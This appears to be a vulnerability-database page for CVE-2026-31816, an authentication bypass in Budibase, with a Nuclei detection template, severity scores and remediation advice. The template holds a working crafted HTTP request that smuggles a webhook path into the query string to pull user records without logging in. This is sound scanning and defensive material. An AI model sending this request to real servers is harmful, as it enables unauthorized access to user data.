Lucene search
K

Budibase - Authentication Bypass

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 46 Views

Budibase up to 3.31.4 has authentication bypass via unanchored webhook path regex, enabling unauthenticated access.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2026-31816
12 Mar 202612:44
githubexploit
ATTACKERKB
CVE-2026-31816
9 Mar 202620:55
attackerkb
Circl
CVE-2026-31816
12 Mar 202608:10
circl
CNNVD
Budibase 注入漏洞
9 Mar 202600:00
cnnvd
CVE
CVE-2026-31816
9 Mar 202620:55
cve
Cvelist
CVE-2026-31816 Budibase Universal Auth Bypass via Webhook Query Param Injection
9 Mar 202620:55
cvelist
EUVD
EUVD-2026-10358
9 Mar 202620:55
euvd
EUVD
EUVD-2026-10359
9 Mar 202620:55
euvd
NVD
CVE-2026-31816
9 Mar 202621:16
nvd
OSV
CVE-2026-31816 Budibase Universal Auth Bypass via Webhook Query Param Injection
9 Mar 202620:55
osv
Rows per page
id: CVE-2026-31816

info:
  name: Budibase - Authentication Bypass
  author: theamanrawat
  severity: critical
  description: |
    Budibase <= 3.31.4 contains an authentication bypass caused by unanchored regex in authorized() middleware matching webhook path patterns in query strings, letting unauthenticated remote attackers access any server-side API endpoint, exploit requires crafted request with webhook pattern in URL.
  impact: |
    Unauthenticated remote attackers can bypass all authentication and authorization to access any server-side API endpoint.
  remediation: |
    Update to a version later than 3.31.4 or latest available version.
  reference:
    - https://github.com/Budibase/budibase/security/advisories/GHSA-gw94-hprh-4wj8
    - https://nvd.nist.gov/vuln/detail/CVE-2026-31816
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2026-31816
    epss-score: 0.15339
    epss-percentile: 0.96382
    cwe-id: CWE-74
  metadata:
    max-request: 1
    verified: true
  tags: cve,cve2026,budibase,auth-bypass,vuln,unauthenticated,vkev

http:
  - raw:
      - |
        POST /api/ta_users/search?/webhooks/trigger HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        x-budibase-app-id: {{app_id}}

        {"query":{},"limit":1000}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "email", "roleId", "status")'
        condition: and
# digest: 4a0a00473045022100a3e3a11f8b67e6c1c7dc0734a4a12d673d076546a16092f1af10eb59125d4a1f022071486dc93f62f6da19c96de1b52095f2d4968277ec1fddb7e44ec4ed4cd01aed:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

25 Mar 2026 08:37Current
6Medium risk
Vulners AI Score6
CVSS 3.19.1
EPSS0.15339
SSVC
46